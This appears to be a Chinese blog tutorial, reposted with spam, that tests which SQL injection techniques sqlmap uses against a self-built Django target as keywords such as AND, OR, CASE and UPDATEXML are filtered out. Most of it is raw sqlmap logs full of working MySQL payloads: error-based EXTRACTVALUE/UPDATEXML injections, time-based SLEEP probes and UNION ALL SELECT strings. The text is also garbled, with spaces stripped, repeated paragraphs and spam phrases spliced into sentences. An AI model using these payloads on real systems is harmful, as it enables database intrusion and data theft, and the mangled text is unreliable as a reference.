如何研究sqlmap使用的注入技术


这篇文章给大家介绍如何研究sqlmap使用的注入技术,内容非常详细,感兴趣的小伙伴们可以参考借鉴,希望对大家能有所帮助。使用django搭建了一个注入靶机正常页面加上单引号在SQLMAP注入检测技术有这几种
注入命令使用这个payload的时候,测试能不能使用if函数,如果if成功则会睡眠5秒,否则返回6670,而6670又等于外面的6670,所以会返回1
假如我禁止使用字符串ANDsqlmap就会自己选择or当使用or+slee(5)的时候,无法执行sleep就会切换成这种模式成功睡眠免费云主机域名它将结果作为一个子查询作为一个表,后面那个Drzz是作为别名返回。假如禁掉的是AND,IF字符串,就会失败假如禁掉的是AND,OR字符串假如禁掉的是AND,OR,RLIKE字符串假如禁掉的是AND,OR,RLIKE,CASE字符串,就会直接使用select进行查询,不适用and,or
假如禁掉的是AND,OR,RLIKE,CASE,SELECT字符串假如禁掉的是AND,OR,RLIKE,CASE,SELECT,ELT字符串假如禁掉的是AND,OR,RLIKE,CASE,SELECT,ELT,MAKE_SET字符串,就会报错让我们回归到初始,禁止SLEEP字符串当我禁止SLEEP,BENCHMARK,就会失败,说明基于时间注入就是这两个函数之一控制的默认情况,由AND进行判断结果是否相等禁掉AND就会使用case when then语句进行查询禁掉AND,CASE
sqlmap就会用make_set函数禁掉AND,CASE,MAKE_SET
使用ELT函数禁掉AND,CASE,MAKE_SET,ELT
直接相乘了禁掉AND,CASE,MAKE_SET,ELT,*,就会报错
默认情况标签查找元素一样
语法:extractvalue(目标xml文档,xml路径)
第二个参数xml中的位置是可操作的地方,xml文档中查找字符位置是用/xxx/xxx/xxx/…这种格式,如果我们写入其他格式,就会报错,并且会返回我们写入的非法格式内容,而这个非法的内容就是我们想要查询的内容。
正常查询第二个参数的位置格式为/xxx/xx/xx/xx,即使查询不到也不会报错
selectusernamefromsecurity.userwhereid=1and(extractvalue(‘anything’,’/x/xx’))

[09:22:46][PAYLOAD]1ANDEXTRACTVALUE(7450,CONCAT(0x5c,0x7176627171,(SELECT(CASEWHEN(5241=5241)THEN1ELSE0END)),0x71626a6b71))
[09:22:46][DEBUG]gotHTTPerrorcode:500(InternalServerError)
[09:22:46][DEBUG]performed1queriesin0.12seconds
[09:22:46][DEBUG]checkingforfilteredcharacters
GETparameter'id'isvulnerable.Doyouwanttokeeptestingtheothers(ifany)?[y/N]N
[09:22:46][DEBUG]usedthedefaultbehaviour,runninginbatchmode
sqlmapidentifiedthefollowinginjectionpoint(s)withatotalof430HTTP(s)requests:
---
Parameter:id(GET)
Type:error-based
Title:MySQL>=5.1ANDerror-based-WHERE,HAVING,ORDERBYorGROUPBYclause(EXTRACTVALUE)
Payload:id=1ANDEXTRACTVALUE(4041,CONCAT(0x5c,0x7176627171,(SELECT(ELT(4041=4041,1))),0x71626a6b71))
Vector:ANDEXTRACTVALUE([RANDNUM],CONCAT('','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'))
---

禁掉AND,就会使用OR

[09:27:36][PAYLOAD]1OREXTRACTVALUE(6984,CONCAT(0x5c,0x716b7a7171,(SELECT(CASEWHEN(2831=2831)THEN1ELSE0END)),0x717a7a7171))
[09:27:36][DEBUG]gotHTTPerrorcode:500(InternalServerError)
[09:27:36][DEBUG]performed1queriesin0.13seconds
[09:27:36][DEBUG]checkingforfilteredcharacters
GETparameter'id'isvulnerable.Doyouwanttokeeptestingtheothers(ifany)?[y/N]N
[09:27:36][DEBUG]usedthedefaultbehaviour,runninginbatchmode
sqlmapidentifiedthefollowinginjectionpoint(s)withatotalof483HTTP(s)requests:
---
Parameter:id(GET)
Type:error-based
Title:MySQL>=5.1ORerror-based-WHERE,HAVING,ORDERBYorGROUPBYclause(EXTRACTVALUE)
Payload:id=1OREXTRACTVALUE(9441,CONCAT(0x5c,0x716b7a7171,(SELECT(ELT(9441=9441,1))),0x717a7a7171))
Vector:OREXTRACTVALUE([RANDNUM],CONCAT('','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'))
---

禁掉AND,OR,就会出现updatexml

[09:29:23][PAYLOAD](UPDATEXML(9878,CONCAT(0x2e,0x7162716b71,(SELECT(CASEWHEN(8893=8893)THEN1ELSE0END)),0x716b6b6271),9352))
[09:29:23][DEBUG]gotHTTPerrorcode:500(InternalServerError)
[09:29:23][DEBUG]performed1queriesin0.16seconds
[09:29:23][DEBUG]checkingforfilteredcharacters
GETparameter'id'isvulnerable.Doyouwanttokeeptestingtheothers(ifany)?[y/N]N
[09:29:23][DEBUG]usedthedefaultbehaviour,runninginbatchmode
sqlmapidentifiedthefollowinginjectionpoint(s)withatotalof838HTTP(s)requests:
---
Parameter:id(GET)
Type:error-based
Title:MySQL>=5.1error-based-Parameterreplace(UPDATEXML)
Payload:id=(UPDATEXML(6736,CONCAT(0x2e,0x7162716b71,(SELECT(ELT(6736=6736,1))),0x716b6b6271),8672))
Vector:(UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM1]))
---
[09:29:23][INFO]theback-endDBMSisMySQL
back-endDBMS:MySQL>=5.1

禁掉AND,OR,UPDATEXML,就会出现EXTRACTVALUE

[09:31:15][PAYLOAD](EXTRACTVALUE(1250,CONCAT(0x5c,0x7171627671,(SELECT(CASEWHEN(9342=9342)THEN1ELSE0END)),0x716b6b6271)))
[09:31:15][DEBUG]gotHTTPerrorcode:500(InternalServerError)
[09:31:15][DEBUG]performed1queriesin0.18seconds
[09:31:15][DEBUG]checkingforfilteredcharacters
GETparameter'id'isvulnerable.Doyouwanttokeeptestingtheothers(ifany)?[y/N]N
[09:31:15][DEBUG]usedthedefaultbehaviour,runninginbatchmode
sqlmapidentifiedthefollowinginjectionpoint(s)withatotalof839HTTP(s)requests:
---
Parameter:id(GET)
Type:error-based
Title:MySQL>=5.1error-based-Parameterreplace(EXTRACTVALUE)
Payload:id=(EXTRACTVALUE(3610,CONCAT(0x5c,0x7171627671,(SELECT(ELT(3610=3610,1))),0x716b6b6271)))
Vector:(EXTRACTVALUE([RANDNUM],CONCAT('','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]')))
---

禁掉AND,OR,UPDATEXML,EXTRACTVALUE,就会失败

联合查询(U)

默认情况

[09:37:07][INFO]checkingiftheinjectionpointonGETparameter'id'isafalsepositive
[09:37:07][PAYLOAD]-1466UNIONALLSELECTNULL,CONCAT(0x71787a7671,(CASEWHEN(17=17)THEN1ELSE0END),0x7162717671)--hZgY
[09:37:07][DEBUG]performed1queriesin0.01seconds
[09:37:07][PAYLOAD]-6665UNIONALLSELECTNULL,CONCAT(0x71787a7671,(CASEWHEN(17=24)THEN1ELSE0END),0x7162717671)--YsNa
[09:37:07][DEBUG]performed1queriesin0.02seconds
[09:37:07][PAYLOAD]-4215UNIONALLSELECTNULL,CONCAT(0x71787a7671,(CASEWHEN(17=51)THEN1ELSE0END),0x7162717671)--ejrD
[09:37:07][DEBUG]performed1queriesin0.01seconds
[09:37:07][PAYLOAD]-8306UNIONALLSELECTNULL,CONCAT(0x71787a7671,(CASEWHEN(51=24)THEN1ELSE0END),0x7162717671)--yobT
[09:37:07][DEBUG]performed1queriesin0.01seconds
[09:37:07][PAYLOAD]-8304UNIONALLSELECTNULL,CONCAT(0x71787a7671,(CASEWHEN(24=24)THEN1ELSE0END),0x7162717671)--Gyxy
[09:37:07][DEBUG]performed1queriesin0.01seconds
[09:37:07][PAYLOAD]-4122UNIONALLSELECTNULL,CONCAT(0x71787a7671,(CASEWHEN(5124)THEN1ELSE0END),0x7162717671)--zULK
[09:37:07][DEBUG]gotHTTPerrorcode:500(InternalServerError)
[09:37:07][DEBUG]performed1queriesin0.14seconds
[09:37:07][PAYLOAD]-2502UNIONALLSELECTNULL,CONCAT(0x71787a7671,(CASEWHEN(47=47)THEN1ELSE0END),0x7162717671)--QCrG
[09:37:07][DEBUG]performed1queriesin0.01seconds
[09:37:07][PAYLOAD]-9061UNIONALLSELECTNULL,CONCAT(0x71787a7671,(CASEWHEN(47=70)THEN1ELSE0END),0x7162717671)--SJaU
[09:37:07][DEBUG]performed1queriesin0.01seconds
[09:37:07][PAYLOAD]-4383UNIONALLSELECTNULL,CONCAT(0x71787a7671,(CASEWHEN(47=95)THEN1ELSE0END),0x7162717671)--ailf
[09:37:07][DEBUG]performed1queriesin0.01seconds
[09:37:07][PAYLOAD]-4171UNIONALLSELECTNULL,CONCAT(0x71787a7671,(CASEWHEN(95=70)THEN1ELSE0END),0x7162717671)--TkVB
[09:37:07][DEBUG]performed1queriesin0.01seconds
[09:37:07][PAYLOAD]-1142UNIONALLSELECTNULL,CONCAT(0x71787a7671,(CASEWHEN(70=70)THEN1ELSE0END),0x7162717671)--YlcG
[09:37:07][DEBUG]performed1queriesin0.01seconds
[09:37:07][PAYLOAD]-8375UNIONALLSELECTNULL,CONCAT(0x71787a7671,(CASEWHEN(9570)THEN1ELSE0END),0x7162717671)--Ijdy
[09:37:08][DEBUG]gotHTTPerrorcode:500(InternalServerError)
[09:37:08][DEBUG]performed1queriesin0.15seconds
[09:37:08][PAYLOAD]-4934UNIONALLSELECTNULL,CONCAT(0x71787a7671,(CASEWHEN(25=25)THEN1ELSE0END),0x7162717671)--IYqW
[09:37:08][DEBUG]performed1queriesin0.02seconds
[09:37:08][PAYLOAD]-1613UNIONALLSELECTNULL,CONCAT(0x71787a7671,(CASEWHEN(25=31)THEN1ELSE0END),0x7162717671)--lFQL
[09:37:08][DEBUG]performed1queriesin0.01seconds
[09:37:08][PAYLOAD]-2297UNIONALLSELECTNULL,CONCAT(0x71787a7671,(CASEWHEN(25=63)THEN1ELSE0END),0x7162717671)--Koxh
[09:37:08][DEBUG]performed1queriesin0.01seconds
[09:37:08][PAYLOAD]-3230UNIONALLSELECTNULL,CONCAT(0x71787a7671,(CASEWHEN(63=31)THEN1ELSE0END),0x7162717671)--DFuT
[09:37:08][DEBUG]performed1queriesin0.01seconds
[09:37:08][PAYLOAD]-4541UNIONALLSELECTNULL,CONCAT(0x71787a7671,(CASEWHEN(31=31)THEN1ELSE0END),0x7162717671)--wbyE
[09:37:08][DEBUG]performed1queriesin0.01seconds
[09:37:08][PAYLOAD]-4571UNIONALLSELECTNULL,CONCAT(0x71787a7671,(CASEWHEN(6331)THEN1ELSE0END),0x7162717671)--RoAK
[09:37:08][DEBUG]gotHTTPerrorcode:500(InternalServerError)
[09:37:08][DEBUG]performed1queriesin0.13seconds
[09:37:08][PAYLOAD]-4255UNIONALLSELECTNULL,CONCAT(0x71787a7671,(CASEWHEN(12=12)THEN1ELSE0END),0x7162717671)--HeVB
[09:37:08][DEBUG]performed1queriesin0.01seconds
[09:37:08][PAYLOAD]-2162UNIONALLSELECTNULL,CONCAT(0x71787a7671,(CASEWHEN(12=59)THEN1ELSE0END),0x7162717671)--UdBM
[09:37:08][DEBUG]performed1queriesin0.01seconds
[09:37:08][PAYLOAD]-3636UNIONALLSELECTNULL,CONCAT(0x71787a7671,(CASEWHEN(12=85)THEN1ELSE0END),0x7162717671)--quEm
[09:37:08][DEBUG]performed1queriesin0.01seconds
[09:37:08][PAYLOAD]-9996UNIONALLSELECTNULL,CONCAT(0x71787a7671,(CASEWHEN(85=59)THEN1ELSE0END),0x7162717671)--tmiF
[09:37:08][DEBUG]performed1queriesin0.03seconds
[09:37:08][PAYLOAD]-1861UNIONALLSELECTNULL,CONCAT(0x71787a7671,(CASEWHEN(59=59)THEN1ELSE0END),0x7162717671)--dZZv
[09:37:08][DEBUG]performed1queriesin0.01seconds
[09:37:08][PAYLOAD]-2005UNIONALLSELECTNULL,CONCAT(0x71787a7671,(CASEWHEN(8559)THEN1ELSE0END),0x7162717671)--OulK
[09:37:08][DEBUG]gotHTTPerrorcode:500(InternalServerError)
[09:37:08][DEBUG]performed1queriesin0.11seconds
[09:37:08][PAYLOAD]-2028UNIONALLSELECTNULL,CONCAT(0x71787a7671,(CASEWHEN(26=26)THEN1ELSE0END),0x7162717671)--iRZQ
[09:37:08][DEBUG]performed1queriesin0.01seconds
[09:37:08][PAYLOAD]-2447UNIONALLSELECTNULL,CONCAT(0x71787a7671,(CASEWHEN(26=39)THEN1ELSE0END),0x7162717671)--IPSM
[09:37:08][DEBUG]performed1queriesin0.01seconds
[09:37:08][PAYLOAD]-8785UNIONALLSELECTNULL,CONCAT(0x71787a7671,(CASEWHEN(26=83)THEN1ELSE0END),0x7162717671)--cbzQ
[09:37:08][DEBUG]performed1queriesin0.02seconds
[09:37:08][PAYLOAD]-2637UNIONALLSELECTNULL,CONCAT(0x71787a7671,(CASEWHEN(83=39)THEN1ELSE0END),0x7162717671)--wwBL
[09:37:08][DEBUG]performed1queriesin0.01seconds
[09:37:08][PAYLOAD]-8945UNIONALLSELECTNULL,CONCAT(0x71787a7671,(CASEWHEN(39=39)THEN1ELSE0END),0x7162717671)--qohR
[09:37:08][DEBUG]performed1queriesin0.01seconds
[09:37:08][PAYLOAD]-2184UNIONALLSELECTNULL,CONCAT(0x71787a7671,(CASEWHEN(8339)THEN1ELSE0END),0x7162717671)--vJmq
[09:37:08][DEBUG]gotHTTPerrorcode:500(InternalServerError)
[09:37:08][DEBUG]performed1queriesin0.13seconds
[09:37:08][DEBUG]checkingforparameterlengthconstraintingmechanisms
[09:37:08][PAYLOAD]-6805UNIONALLSELECTNULL,CONCAT(0x71787a7671,(CASEWHEN(6024=6024)THEN1ELSE0END),0x7162717671)--aqzt
[09:37:08][DEBUG]performed1queriesin0.02seconds
[09:37:08][DEBUG]checkingforfilteredcharacters
GETparameter'id'isvulnerable.Doyouwanttokeeptestingtheothers(ifany)?[y/N]N
[09:37:08][DEBUG]usedthedefaultbehaviour,runninginbatchmode
sqlmapidentifiedthefollowinginjectionpoint(s)withatotalof87HTTP(s)requests:
---
Parameter:id(GET)
Type:UNIONquery
Title:GenericUNIONquery(NULL)-2columns
Payload:id=-1722UNIONALLSELECTNULL,CONCAT(0x71787a7671,0x417a6144526d48684971744f484c49585966416b4b66736851446c6d53787a63446b41705a715747,0x7162717671)--Nyot
Vector:UNIONALLSELECTNULL,[QUERY][GENERIC_SQL_COMMENT]
---

禁掉union,就会报错

禁掉SELECT,也会报错

禁掉CONCAT,也会失败

禁掉CASE

关于如何研究sqlmap使用的注入技术就分享到这里了,希望以上内容可以对大家有一定的帮助,可以学到更多知识。如果觉得文章不错,可以把它分享出去让更多的人看到。

禁掉AND,就会使用OR禁掉AND,OR,就会出现updatexml禁掉AND,OR,UPDATEXML,就会出现EXTRACTVALUE禁掉AND,OR,UPDATEXML,EXTRACTVALUE,就会失败
默认情况禁掉union,就会报错禁掉SELECT,也会报错禁掉CONCAT,也会失败禁掉CASE关于如何研究sqlmap使用的注入技术就分享到这里了,希望以上内容可以对大家有一定的帮助,可以学到更多知识。如果觉得文章不错,可以把它分享出去让更多的人看到。免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@if98.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。

相关推荐: 蓝牙设备探测工具blueranger有什么用

这篇文章将为大家详细讲解有关蓝牙设备探测工具blueranger有免费云主机域名什么用,小编觉得挺实用的,因此分享给大家做个参考,希望大家阅读完这篇文章后可以有所收获。蓝牙设备探测工具blueranger blueranger是Kali Linux预安装的一款…

免责声明:本站发布的图片视频文字,以转载和分享为主,文章观点不代表本站立场,本站不承担相关法律责任;如果涉及侵权请联系邮箱:360163164@qq.com举报,并提供相关证据,经查实将立刻删除涉嫌侵权内容。

Like (0)
Donate 微信扫一扫 微信扫一扫
Previous 02/07 15:42
Next 02/07 15:43